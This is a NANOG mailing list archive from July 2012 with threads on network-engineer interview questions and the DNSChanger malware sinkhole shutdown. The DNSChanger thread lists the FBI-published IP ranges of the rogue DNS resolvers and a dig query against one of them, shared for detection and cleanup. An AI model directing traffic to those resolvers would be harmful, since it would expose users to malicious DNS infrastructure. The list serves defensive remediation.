config look like on the router" >> 4) "Is there a firewall in between" >> >> I believe these questions may be asked in the right context provided there >> is enough information to isolate the issue to the network however the >> statement is devoid of anything useful that would make the network suspect. >> I would like to hear some questions such as: >> >> "are other websites accessible? Or is the only website the client is >> experiencing issues with?" >> "was the website working previously? when did it start happening?" >> "what does the client see on their screen ? are they getting an error?" >> >> These questions reflect the persons ability to accurately understand the >> problem before deep diving into the technical details. From there, you can >> get more technical. "Client is receiving an HTTP 404 error." Great, rule >> out network since this is an application layer response... >> >> just my .02. >> >> On Fri, Jul 6, 2012 at 8:28 AM, wrote: >> >>> I agree. Let the person talk do a few probing questions based off what >>> they say. If you yourself have any value you should be able to tell if they >>> have a chance. >>> >>> Also I would prefer someone who says I don't know for sure but maybe >>> something along these lines, and then wants to know the right answer. >>> Passion is also important, if you are willing to hire someone who is in it >>> for just a paycheck, save yourself the headache and get a contractor. >>> -- >>> Sent from my Android phone with K-9 Mail. Please excuse my brevity. >>> >>> Matthew Palmer wrote: >>> >>> On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: >>>> Diogo Montagner writes: >>>>> For screening questions (for 1st level filtering), IMO, the questions >>>>> has to be straight to the point, for example: >>>>> >>>>> 1) What is the LSA number for an external route in OSPF? >>>>> >>>>> This can have two answer: 5 or 7. So, I will accept if the candidate >>>>> answer 5, 7 or 5 and 7. Later on (the next level of the interview), a >>>>> techinical interviewer will chech if the candidate understand the >>>>> differences of LSA 5 and 7. >>>> >>>> Frankly, this feels a bit like asking what the 9th byte in an IP >>>> header is used for (it's TTL, but who's, uh, counting?) -- "That's why >>>> God gave us packet analyzers" should be counted as an acceptable >>>> answer. If not, you'll find yourself skipping over plenty of >>>> extremely well qualified candidates in favor of those who have crammed >>>> recently for some sort of exam in hopes of compensating for their >>>> short CV. >>> >>> Ugh, I know someone (thankfully no longer a current colleague) who ardently >>> *defends* his use of questions like "what does the -M option to ps do?" on >>> the basis that "any senior person who knows what they're doing should know >>> all the options to ps!". No, you useless tit, anyone who knows what they're >>> doing should know how to read a bloody manpage. >>> >>> Trivia tests get you hiring people who know trivia. Knowing trivia has it's >>> productivity benefits, but if you can't apply it, it's useless. >>> >>> - Matt >>> >>> -- >>> Politics and religion are just like software and hardware. They all suck, >>> the documentation is provably incorrect, and all the vendors tell lies. >>> -- Andrew Dalgleish, in the Monastery >>> >>> >>> >> >> >> -- >> -Matt Chung > > > This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited. From surfer at mauigateway.com Fri Jul 6 14:53:59 2012 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 6 Jul 2012 12:53:59 -0700 Subject: job screening question Message-ID: <20120706125359.EEE0EE9F@m0005297.ppops.net> --- don at bowenvale.co.nz wrote: From: Don Gould I have 25 years IT experience... I've applied for a few jobs in my time... I thought to myself "I'll have a crack with a few comments!!!"... ....then I read down the next 30 posts and decided that perhaps I didn't really know enough about networking to really comment... But seriously guys, great thread with tons of really interesting stuff and a bunch of history. --------------------------------------------------- Sure as heck had me going to search engines to make sure I knew the answers... ;-) And, yes, it was an interesting thread. scott From tomb at byrneit.net Fri Jul 6 14:58:44 2012 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Fri, 6 Jul 2012 12:58:44 -0700 Subject: DNS Changer items In-Reply-To: <4FF72B49.2020302@gmail.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com> Message-ID: <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org> I think having the ISC DNS changer sinkhole servers return the DCWG check page IP for all queries would be a good final act. > -----Original Message----- > From: Andrew Fried [mailto:andrew.fried at gmail.com] > Sent: Friday, July 06, 2012 11:16 AM > To: Cameron Byrne > Cc: nanog at nanog.org > Subject: Re: DNS Changer items > > The DNS redirection began on November 8, 2011. The servers were > instrumented to capture a very small portion of the dns data (source ip and > port only) so that reports of infected users could be sent to the ISPs via > reporting organizations like Shadowserver. > > Some ISPs did create walled gardens. Some merely redirected affected > customers to their own internal DNS servers. Some ISPs did aggressive > notifications to their users. And some ISPs did nothing. > > Sites were set up to allow users to check their systems (dns-ok.us, etc). The > DCWG set up an information site to provide information on how to detect > the DNSchanger infection and how to fix it. AV companies provided tools to > help clean up systems, and the tools were published on the DCWG.org > website. > > The FBI went to great lengths to get press coverage to get the word out. > > This operation has been ongoing for 7 months, 27 days and 14 hours. > > How much more of a graceful ramp down could there have been? > > Andy > > Andrew Fried > andrew.fried at gmail.com > > > On 7/6/12 1:52 PM, Cameron Byrne wrote: > > So insteading of turning the servers off, would it not have been > > helpful to have the servers return a "captive portal" type of reponse > > saying "hey, since you use this server, you are broken, go here to get fixed" > > > > Seems that would have been a more graceful ramp down. > > > > CB > > > From tomb at byrneit.net Fri Jul 6 14:59:54 2012 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Fri, 6 Jul 2012 12:59:54 -0700 Subject: DNS Changer items In-Reply-To: <9602.1341597996@turing-police.cc.vt.edu> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <9602.1341597996@turing-police.cc.vt.edu> Message-ID: <72F9A69DCF990443B2CEC064E605CE064A8177@Pascal.zaphodb.org> > -----Original Message----- > From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu] > Sent: Friday, July 06, 2012 11:07 AM > To: Cameron Byrne > Cc: nanog at nanog.org > Subject: Re: DNS Changer items > > On Fri, 06 Jul 2012 10:52:56 -0700, Cameron Byrne said: > > So insteading of turning the servers off, would it not have been > > helpful to have the servers return a "captive portal" type of reponse > > Not all DNS lookups are for HTTP. [Tomas L. Byrnes] It's still better to do this than simply turn off all resolution. From owen at delong.com Fri Jul 6 15:08:13 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 6 Jul 2012 13:08:13 -0700 Subject: job screening question In-Reply-To: References: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com> Message-ID: On Jul 6, 2012, at 12:23 PM, Tyler Haske wrote: > DNA; Homo Sapien. > > Smart questions get smart answers. > > If you want HR to test technical knowledge just make a multiple choice test. (Course then you open a new can of worms). > One of my employers did exactly this. I provided the answers I believed to be most likely what they were looking for in addition to a set of corrections to the questions. Owen From andrew.fried at gmail.com Fri Jul 6 15:15:43 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Fri, 06 Jul 2012 16:15:43 -0400 Subject: DNS Changer items In-Reply-To: <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com> <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org> Message-ID: <4FF7476F.5030809@gmail.com> Cameron, That idea had been brought up. Also discussed was short durations of random blackouts of dns resolution to impress upon the infected users that they needed to take action. Unfortunately, taking either of those actions would have exceeded the authorization of the court order. We're coming up with a pretty detailed list of "lesson's learned" from this operation and being able to implement ideas like yours will hopefully be considered in advance "next time". Andy Andrew Fried andrew.fried at gmail.com On 7/6/12 3:58 PM, Tomas L. Byrnes wrote: > I think having the ISC DNS changer sinkhole servers return the DCWG > check page IP for all queries would be a good final act. > >> -----Original Message----- >> From: Andrew Fried [mailto:andrew.fried at gmail.com] >> Sent: Friday, July 06, 2012 11:16 AM >> To: Cameron Byrne >> Cc: nanog at nanog.org >> Subject: Re: DNS Changer items >> >> The DNS redirection began on November 8, 2011. The servers were >> instrumented to capture a very small portion of the dns data (source > ip and >> port only) so that reports of infected users could be sent to the ISPs > via >> reporting organizations like Shadowserver. >> >> Some ISPs did create walled gardens. Some merely redirected affected >> customers to their own internal DNS servers. Some ISPs did aggressive >> notifications to their users. And some ISPs did nothing. >> >> Sites were set up to allow users to check their systems (dns-ok.us, > etc). The >> DCWG set up an information site to provide information on how to > detect >> the DNSchanger infection and how to fix it. AV companies provided > tools to >> help clean up systems, and the tools were published on the DCWG.org >> website. >> >> The FBI went to great lengths to get press coverage to get the word > out. >> >> This operation has been ongoing for 7 months, 27 days and 14 hours. >> >> How much more of a graceful ramp down could there have been? >> >> Andy >> >> Andrew Fried >> andrew.fried at gmail.com >> >> >> On 7/6/12 1:52 PM, Cameron Byrne wrote: >>> So insteading of turning the servers off, would it not have been >>> helpful to have the servers return a "captive portal" type of > reponse >>> saying "hey, since you use this server, you are broken, go here to > get fixed" >>> >>> Seems that would have been a more graceful ramp down. >>> >>> CB >>> >> > From r.engehausen at gmail.com Fri Jul 6 15:45:55 2012 From: r.engehausen at gmail.com (Roy) Date: Fri, 06 Jul 2012 13:45:55 -0700 Subject: DNS Changer items In-Reply-To: <4FF7476F.5030809@gmail.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com> <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org> <4FF7476F.5030809@gmail.com> Message-ID: <4FF74E83.6090902@gmail.com> On 7/6/2012 1:15 PM, Andrew Fried wrote: > Cameron, > > That idea had been brought up. Also discussed was short durations of > random blackouts of dns resolution to impress upon the infected users > that they needed to take action. Unfortunately, taking either of those > actions would have exceeded the authorization of the court order. > > We're coming up with a pretty detailed list of "lesson's learned" from > this operation and being able to implement ideas like yours will > hopefully be considered in advance "next time". > > Andy > > Andrew Fried > andrew.fried at gmail.com > > Doesn't the court order expire as of Monday? What happens to those IP ranges then? From dgolding at ragingwire.com Fri Jul 6 15:50:34 2012 From: dgolding at ragingwire.com (Dan Golding) Date: Fri, 6 Jul 2012 13:50:34 -0700 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF607C@SMF-ENTXM-001.sac.ragingwire.net> > -----Original Message----- > > I imagine Netflix is mature enough to track this data as you suggest, > and that's why they use AWS - downtime isn't a big deal for their > business unless it gets really, really bad. There is another possibility that is probably much more widespread amongst AWS (and other cloud) customers. Here is the scenario: You are a small, hungry startup. No capital for servers. Cloud seems great. Then, big growth hits! Cloud seems even better - you may have the capital now, thanks to friendly VC/public investment/private equity, but you don't have the time to catch up. So, keep using cloud. Then, the now mid-sized company discovers one day that their use of the cloud is no longer economical, if it ever was. They are big enough to use a dedicated hardware in collocation or wholesale datacenter solution, with blended transit from some upstreams. But the cost to transition out of cloud is big, too. So, they might go with a hybrid strategy, at least for a few years. This happens all the time. Not saying Netflix is doing this, but lots of other folks are. It?s a trap that?s easy to fall into. Especially with rapid growth. - Dan From tomb at byrneit.net Fri Jul 6 16:23:34 2012 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Fri, 6 Jul 2012 14:23:34 -0700 Subject: DNS Changer items In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com> References: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com> Message-ID: <72F9A69DCF990443B2CEC064E605CE064A8179@Pascal.zaphodb.org> For anyone who wants to find any hosts behind their firewall that are still infected, you can post a firewall log into our public site, and we'll call out all attempts to contact the sinkhole servers (with the internal IPs), assuming you log outbound DNS or all connections. http://www.threatstop.com/dnschanger We've been doing this for subscribers (including free community ones) since we got the sinkhole IPs from Andrew @ SIE/MAAWG. > -----Original Message----- > From: Eric J Esslinger [mailto:eesslinger at fpu-tn.com] > Sent: Friday, July 06, 2012 11:10 AM > To: 'nanog at nanog.org' > Subject: RE: DNS Changer items > > We verified one a while back, who had already had the problem fixed when > the FBI sent us the physical mail. Concidering number of internet customers > in the US vs our internet customers with known number of US subsribers > affected at it's height, I figure if the percentages are good we've taken care > of several times the number of likely cases on our network with that one > customer. > *wink* > I'm told by various sources to expect similar stories on the nightly national > news programs tonight, with a similar 'call your isp' ending. I've also heard the > site IS reachable via ipv6 and they are dealing with the load issues as we > speak (and some people are getting through, albiet slowly). > > I'm pretty comfortable about my network; I've been catching dns lookup > destinations from my users for months (not contents, just destination ip's) > and the list of outside addresses covers most of the well know public dns > servers (open dns, google, etc...) with the exception of a handful that seem > to be running their own full blown recursive caching servers, which go > everywhere looking for authoritative lookups. (One I knew about, he > complains because I won't allow his basic cable account act as an open server > for his DNS when he's out of town. If he wants a static IP I can arrange > opening the port, till then... He is always welcome to VPN into his home > network as well.) > > Been having callers look up their IP, then checking the query logs to see if > they hit our dns servers. So far I'm at 100% > > I thought of whipping up a script for my recursive DNS servers to setup a > webpage to let them see if they were accessing those servers, but I just > don't have time right now (fiscal year just started and everyone wants their > projects done 'now'.) > > Addendum: Site appears up and fast now. So that's something anyway. > > __________________________ > Eric Esslinger > Information Services Manager - Fayetteville Public Utilities http://www.fpu- > tn.com/ > (931)433-1522 ext 165 > > > > > -----Original Message----- > > From: Merike Kaeo [mailto:kaeo at merike.com] > > Sent: Friday, July 06, 2012 1:06 PM > > To: Cameron Byrne > > Cc: nanog at nanog.org > > Subject: Re: DNS Changer items > > > > > > The ISPs who have been proactive in mitigating and redirecting have > > been/are doing this. (global reach here) > > > > The court ordered DNS servers have been up since Nov 9th and lots of > > outreach done....the intent was a graceful ramp down. > > Sadly, the state of folks helping with overall malware cleanup is > > still lots of finger pointing. > > > > FUD with press and over sensationalism not helping. > > > > - merike > > > > > > On Jul 6, 2012, at 10:52 AM, Cameron Byrne wrote: > > > > > So insteading of turning the servers off, would it not have been > > > helpful to have the servers return a "captive portal" type > > of reponse > > > saying "hey, since you use this server, you are broken, go > > here to get > > > fixed" > > > > > > Seems that would have been a more graceful ramp down. > > > > > > CB > > > > > > > > This message may contain confidential and/or proprietary information and is > intended for the person/entity to whom it was originally addressed. Any use > by others is strictly prohibited. From jra at baylink.com Fri Jul 6 16:40:07 2012 From: jra at baylink.com (Jay Ashworth) Date: Fri, 6 Jul 2012 17:40:07 -0400 (EDT) Subject: [outages] www.dns-ok.us down In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0FA0@exchange.corp.fpu-tn.com> Message-ID: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com> So... might large and medium ISPs not redirect DNS to those known addresses to a resolver in house, which would log the client IPs and let them know whom to address? Cheers, -- jra ----- Original Message ----- > From: "Eric J Esslinger" > To: "outages at outages.org" > Sent: Friday, July 6, 2012 12:39:56 PM > Subject: [outages] www.dns-ok.us down > As per subject, the DNS Changer Working Group (DCWG) site for the US > is down atm. Also another very probably related issue; Foxnews, CNN, > and MSNBC have all apparantly run stories in the last few hours about > how the internet end is nigh, everyone is infected, and if you have > any questions call your isp. (Hype levels varied per channel, I'm told > as well). > > __________________________ > Eric Esslinger > Information Services Manager - Fayetteville Public Utilities > http://www.fpu-tn.com/ > (931)433-1522 ext 165 > > This message may contain confidential and/or proprietary information > and is intended for the person/entity to whom it was originally > addressed. Any use by others is strictly prohibited. > > _______________________________________________ > Outages mailing list > Outages at outages.org > https://puck.nether.net/mailman/listinfo/outages -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From semenko at alum.mit.edu Fri Jul 6 16:44:28 2012 From: semenko at alum.mit.edu (Nick Semenkovich) Date: Fri, 6 Jul 2012 16:44:28 -0500 Subject: DNS Changer items In-Reply-To: <72F9A69DCF990443B2CEC064E605CE064A8179@Pascal.zaphodb.org> References: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com> <72F9A69DCF990443B2CEC064E605CE064A8179@Pascal.zaphodb.org> Message-ID: > > We've been doing this for subscribers (including free community ones) > since we got the sinkhole IPs from Andrew @ SIE/MAAWG. > At least now, the the ranges are publicly outlined in http://www.fbi.gov/news/stories/2011/november/malware_110911/DNS-changer-malware.pdf 85.255.112.0 through 85.255.127.255 67.210.0.0 through 67.210.15.255 93.188.160.0 through 93.188.167.255 77.67.83.0 through 77.67.83.255 213.109.64.0 through 213.109.79.255 64.28.176.0 through 64.28.191.255 These also return the "RED" dnschanger page: $ dig +short @64.28.180.1 dns-ok.us 38.68.193.97 - Nick -- Nick Semenkovich Laboratory of Dr. Jeffrey I. Gordon Medical Scientist Training Program School of Medicine Washington University in St. Louis http://web.mit.edu/semenko/ From goemon at anime.net Fri Jul 6 17:07:51 2012 From: goemon at anime.net (goemon at anime.net) Date: Fri, 6 Jul 2012 15:07:51 -0700 (PDT) Subject: job screening question In-Reply-To: <4FF70945.4050507@foobar.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> Message-ID: On Fri, 6 Jul 2012, Nick Hilliard wrote: > On 06/07/2012 16:12, valdis.kletnieks at vt.edu wrote: >> On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said: >>> Ugh, I know someone (thankfully no longer a current colleague) who ardently >>> *defends* his use of questions like "what does the -M option to ps do?" on >> Is that an African ps or a European ps? ;) > I'll admit that I once asked a question like in an interview, but it was > only because the candidate had said that he was an expert with the "tar" > command. If you're going to be that full of poop on a CV, you should > expect to be called up on it. This is what baffles me. People keep putting stuff on their resume that they simply don't know anything about. TCP/IP expert, yet they don't know SYN/SYNACK/ACK or subnetting. HTTP expert but they don't know what a 200 response is. -Dan From valdis.kletnieks at vt.edu Fri Jul 6 17:25:18 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 18:25:18 -0400 Subject: job screening question In-Reply-To: Your message of "Fri, 06 Jul 2012 15:07:51 -0700." References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> Message-ID: <25808.1341613518@turing-police.cc.vt.edu> On Fri, 06 Jul 2012 15:07:51 -0700, goemon at anime.net said: > This is what baffles me. People keep putting stuff on their resume that > they simply don't know anything about. TCP/IP expert, yet they don't know > SYN/SYNACK/ACK or subnetting. HTTP expert but they don't know what a 200 > response is. The Friday afternoon cynic in me says it's because it's a move with positive paybacks. There's 3 basic possibilities: 1) You send the puffed resume to a company with clue, it gets recognized as puffed, and you don't get the job. Zero loss, you weren't going to get that job anyhow. 2) You send a boring unpuffed resume to a company sans clue. They recognize it as boring because there's only 3 buzzwords on 2 pages, and you don't get the job. Loss. 3) You send a puffed resume, and the guy doing the hiring doesn't know what the 3-packet mating call of the Internet is *either*. Win. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From deleskie at gmail.com Fri Jul 6 17:27:16 2012 From: deleskie at gmail.com (jim deleskie) Date: Fri, 6 Jul 2012 19:27:16 -0300 Subject: job screening question In-Reply-To: <25808.1341613518@turing-police.cc.vt.edu> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> Message-ID: Pascal's wager.. almost :) On Fri, Jul 6, 2012 at 7:25 PM, wrote: > On Fri, 06 Jul 2012 15:07:51 -0700, goemon at anime.net said: > >> This is what baffles me. People keep putting stuff on their resume that >> they simply don't know anything about. TCP/IP expert, yet they don't know >> SYN/SYNACK/ACK or subnetting. HTTP expert but they don't know what a 200 >> response is. > > The Friday afternoon cynic in me says it's because it's a move with positive > paybacks. There's 3 basic possibilities: > > 1) You send the puffed resume to a company with clue, it gets recognized > as puffed, and you don't get the job. Zero loss, you weren't going to get > that job anyhow. > > 2) You send a boring unpuffed resume to a company sans clue. They recognize it > as boring because there's only 3 buzzwords on 2 pages, and you don't get the > job. Loss. > > 3) You send a puffed resume, and the guy doing the hiring doesn't know what > the 3-packet mating call of the Internet is *either*. Win. > From andrew.fried at gmail.com Fri Jul 6 17:54:43 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Fri, 06 Jul 2012 18:54:43 -0400 Subject: DNS Changer items In-Reply-To: <4FF74E83.6090902@gmail.com> References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com> <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org> <4FF7476F.5030809@gmail.com> <4FF74E83.6090902@gmail.com> Message-ID: <4FF76CB3.7050500@gmail.com> The subnets will probably be held until the conclusion of the criminal trials. After that, the addresses may be held back from assignment for a while (e.g. a year), but eventually they'll get reassigned. Andrew Fried andrew.fried at gmail.com On 7/6/12 4:45 PM, Roy wrote: > On 7/6/2012 1:15 PM, Andrew Fried wrote: >> Cameron, >> >> That idea had been brought up. Also discussed was short durations of >> random blackouts of dns resolution to impress upon the infected users >> that they needed to take action. Unfortunately, taking either of those >> actions would have exceeded the authorization of the court order. >> >> We're coming up with a pretty detailed list of "lesson's learned" from >> this operation and being able to implement ideas like yours will >> hopefully be considered in advance "next time". >> >> Andy >> >> Andrew Fried >> andrew.fried at gmail.com >> >> > > > Doesn't the court order expire as of Monday? What happens to those IP > ranges then? > > > From nick at foobar.org Fri Jul 6 18:07:57 2012 From: nick at foobar.org (Nick Hilliard) Date: Sat, 07 Jul 2012 00:07:57 +0100 Subject: job screening question In-Reply-To: <25808.1341613518@turing-police.cc.vt.edu> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> Message-ID: <4FF76FCD.6070405@foobar.org> On 06/07/2012 23:25, valdis.kletnieks at vt.edu wrote: > The Friday afternoon cynic in me says it's because it's a move with positive > paybacks. There's 3 basic possibilities: > > 1) You send the puffed resume to a company with clue, it gets recognized > as puffed, and you don't get the job. Zero loss, you weren't going to get > that job anyhow. > > 2) You send a boring unpuffed resume to a company sans clue. They recognize it > as boring because there's only 3 buzzwords on 2 pages, and you don't get the > job. Loss. > > 3) You send a puffed resume, and the guy doing the hiring doesn't know what > the 3-packet mating call of the Internet is *either*. Win. or: 4) you get caught out in the interview as being puffed up, but the company hires you anyway despite strongly worded objections from the interviewer, causing the interviewer's eyes to spin in their sockets at the inanity of the decision. You then spend your entire employment at the company proving your ineptitude beyond all possible doubt. I think this is a win, is it? Nick From valdis.kletnieks at vt.edu Fri Jul 6 18:09:54 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Fri, 06 Jul 2012 19:09:54 -0400 Subject: job screening question In-Reply-To: Your message of "Sat, 07 Jul 2012 00:07:57 +0100." <4FF76FCD.6070405@foobar.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: <28572.1341616194@turing-police.cc.vt.edu> On Sat, 07 Jul 2012 00:07:57 +0100, Nick Hilliard said: > 4) you get caught out in the interview as being puffed up, but the company > hires you anyway despite strongly worded objections from the interviewer, > causing the interviewer's eyes to spin in their sockets at the inanity of > the decision. You then spend your entire employment at the company proving > your ineptitude beyond all possible doubt. > > I think this is a win, is it? Yeah - it's a better gig than you would have landed otherwise, isn't it? :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From george.herbert at gmail.com Fri Jul 6 18:16:01 2012 From: george.herbert at gmail.com (George Herbert) Date: Fri, 6 Jul 2012 16:16:01 -0700 Subject: job screening question In-Reply-To: <4FF76FCD.6070405@foobar.org> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: On Fri, Jul 6, 2012 at 4:07 PM, Nick Hilliard wrote: > On 06/07/2012 23:25, valdis.kletnieks at vt.edu wrote: >> The Friday afternoon cynic in me says it's because it's a move with positive >> paybacks. ?There's 3 basic possibilities: >> >> 1) You send the puffed resume to a company with clue, it gets recognized >> as puffed, and you don't get the job. ?Zero loss, you weren't going to get >> that job anyhow. >> >> 2) You send a boring unpuffed resume to a company sans clue. ?They recognize it >> as boring because there's only 3 buzzwords on 2 pages, and you don't get the >> job. ?Loss. >> >> 3) You send a puffed resume, and the guy doing the hiring doesn't know what >> the 3-packet mating call of the Internet is *either*. ?Win. > > or: > > 4) you get caught out in the interview as being puffed up, but the company > hires you anyway despite strongly worded objections from the interviewer, > causing the interviewer's eyes to spin in their sockets at the inanity of > the decision. ?You then spend your entire employment at the company proving > your ineptitude beyond all possible doubt. > > I think this is a win, is it? There's also 5) Didn't have enough clue about the real world to know you were puffing your resume up. 6) Puffed it up a little (worked with Cisco routers, but in the 7200 era, and hasn't categorized skills as recent / older), but hasn't outright lied. I get resumes all the time that are off in some direction. Usually 5) - inflated due to lack of industry scope understanding, some 6). Neither of these is a disqualifier per se. The question is what do they do when you start asking questions and putting it into context. If they put old skills down and admit it, that's fine, just ask them how recent all the various things are and note it down. If they don't have a clue ("But we had IPv6 coursework in university last semester!") they may be an OK beginner. If you're hiring for a junior position that's fine. If you're hiring for a more senior one, I usually let them down gently and explain the scope and breadth of the things they put down and help them aim their resume more accurately in the future. I've had people try to BS me in the interview or outright lie on the resume beforehand. A couple of each out of the last... 325 or so people I've interviewed? Something like that. Not very many. Easy to spot. They were not hired. -- -george william herbert george.herbert at gmail.com From jared at puck.nether.net Fri Jul 6 18:19:53 2012 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 6 Jul 2012 19:19:53 -0400 Subject: [outages] www.dns-ok.us down In-Reply-To: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com> References: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com> Message-ID: <974B1820-583F-42A8-ADBD-9930FAF4CE8C@puck.nether.net> You can get that info from shadow server and others... Jared Mauch On Jul 6, 2012, at 5:40 PM, Jay Ashworth wrote: > So... might large and medium ISPs not redirect DNS to those known addresses > to a resolver in house, which would log the client IPs and let them > know whom to address? > > Cheers, > -- jra > > ----- Original Message ----- >> From: "Eric J Esslinger" >> To: "outages at outages.org" >> Sent: Friday, July 6, 2012 12:39:56 PM >> Subject: [outages] www.dns-ok.us down >> As per subject, the DNS Changer Working Group (DCWG) site for the US >> is down atm. Also another very probably related issue; Foxnews, CNN, >> and MSNBC have all apparantly run stories in the last few hours about >> how the internet end is nigh, everyone is infected, and if you have >> any questions call your isp. (Hype levels varied per channel, I'm told >> as well). >> >> __________________________ >> Eric Esslinger >> Information Services Manager - Fayetteville Public Utilities >> http://www.fpu-tn.com/ >> (931)433-1522 ext 165 >> >> This message may contain confidential and/or proprietary information >> and is intended for the person/entity to whom it was originally >> addressed. Any use by others is strictly prohibited. >> >> _______________________________________________ >> Outages mailing list >> Outages at outages.org >> https://puck.nether.net/mailman/listinfo/outages > > -- > Jay R. Ashworth Baylink jra at baylink.com > Designer The Things I Think RFC 2100 > Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII > St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From andrew.fried at gmail.com Fri Jul 6 18:20:53 2012 From: andrew.fried at gmail.com (Andrew Fried) Date: Fri, 06 Jul 2012 19:20:53 -0400 Subject: [outages] www.dns-ok.us down In-Reply-To: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com> References: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com> Message-ID: <4FF772D5.7060204@gmail.com> Some ISPs are performing internal redirection. Some, in fact, have been doing it since the takedown last November. The redirection has to stop at some point. And keep in mind, most of the systems infected with DNSchanger have other malware running on their boxes, so keeping those systems up indefinitely is actually not a good thing. Andy Andrew Fried andrew.fried at gmail.com On 7/6/12 5:40 PM, Jay Ashworth wrote: > So... might large and medium ISPs not redirect DNS to those known addresses > to a resolver in house, which would log the client IPs and let them > know whom to address? > > Cheers, > -- jra From snoble at sonn.com Fri Jul 6 18:43:56 2012 From: snoble at sonn.com (Steven Noble) Date: Fri, 6 Jul 2012 16:43:56 -0700 Subject: job screening question In-Reply-To: References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org> Message-ID: On Jul 6, 2012, at 4:16 PM, George Herbert wrote: > 6) Puffed it up a little (worked with Cisco routers, but in the 7200 > era, and hasn't categorized skills as recent / older), but hasn't > outright lied. The 7200 is still a heavily used platform today. It has no correlation with current skill sets IMHO. From george.herbert at gmail.com Fri Jul 6 19:04:16 2012 From: george.herbert at gmail.com (George Herbert) Date: Fri, 6 Jul 2012 17:04:16 -0700 Subject: job screening question In-Reply-To: References: 